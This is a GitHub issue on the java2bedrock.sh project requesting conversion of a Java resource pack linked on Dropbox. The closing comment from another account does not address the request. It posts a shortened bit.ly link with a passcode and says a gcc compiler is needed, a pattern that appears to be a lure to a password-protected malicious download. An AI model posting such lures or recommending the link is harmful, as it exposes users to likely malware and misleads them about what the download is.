### ISSUE TITLE
[Pack]:

### ISSUE THREAD

**Issue by lyminhthai2009** [Kas-tle/java2bedrock.sh#34061]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/ncz5w86gg3gkl0cgrex0n/generated.zip?rlkey=6h7l9jdmh45iyy5li6ga3z24f&st=hx58td1w&dl=0

### Default Assets Version

None

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

None

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by Alango-Norjehan** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
